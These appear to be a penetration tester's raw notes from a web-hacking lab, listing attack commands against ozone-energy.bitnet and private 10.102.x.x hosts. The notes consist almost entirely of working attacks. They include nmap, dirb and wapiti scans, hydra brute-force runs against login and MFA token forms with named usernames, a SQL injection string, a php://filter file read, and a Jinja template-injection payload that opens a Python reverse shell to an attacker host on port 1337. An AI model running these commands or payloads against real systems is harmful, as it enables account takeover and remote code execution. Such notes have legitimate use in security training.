# random notes

wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ <http://ozone-energy.bitnet>

a

nmap -sV -p80 ozone-energy.bitnet

wapiti -u <http://ozone-energy.bitnet> -m all

dirb <http://ozone-energy.bitnet> /usr/share/wordlists/custom/ozone-wordlist.txt.

" or "1"="1

hydra -l wscarlett -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/\[LOGINPAGE]:username=^USER^\&password=^PASS^\&Login=Login:Invalid Password"

hydra -l jschmidt -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/login:username=^USER^\&password=^PASS^\&Login=Login:Invalid Username or Password"

{{x().\_module.\_\_builtins\_\_\['\_\_import\_\_']\('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect((\\"x.x.x.x\\",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\[\\"/bin/sh\\", \\"-i\\"]);'")}}

{{5\*'5'}}

dirb <http://10.102.9.99> /usr/share/wordlists/custom/ozone-wordlist.txt

hydra -l admin -P /usr/share/wordlists/custom/ozone-wordlist.txt 10.102.9.99 http-form-post "/login:username=^USER^\&password=^PASS^\&Login=Login:Invalid Password"

{{ for x in ().**class**.**base**.**subclasses**() %}

{{x().\_module.\_\_builtins\_\_\['\_\_import\_\_']\('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect((\\"10.102.7.0\\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\[\\"/bin/sh\\", \\"-i\\"]);'")}}{% endfor }}

php\://filter/convert.base64-encode/resource=/token.txt

echo 'bGludXhoaW50LmNvbQo=' | base64 --decode

GET /auth?user=YWRtaW4%3D\&token=dHJ1ZQ%3D%3D\&rememberMe=False HTTP/1.1

hydra -l admin -P /home/kali/generate.txt 10.102.11.237 http-form-post "/prompt:mfa\_token=^password\&Login=Login:Invalid token, please try again."

hydra -l admin -P /home/kali/Downloads/list3.txt 10.102.11.237 http-form-post "/prompt:username=^USER^\&mfa\_token=^PASS^\&Login=Login:Invalid token, please try again."

i=0 while \[ "$i" -le 9999 ]; do printf '%04d\n' "$i" i=$(( i + 1 )) done

Look at the host, not just the webapp identify the web server platform is there admin portals? \
Look for dangerouse http methods - PUT, COPY, DELETE, TRACE \
are they vulnerable to directy traversal, shellshock \
use nmap to check ports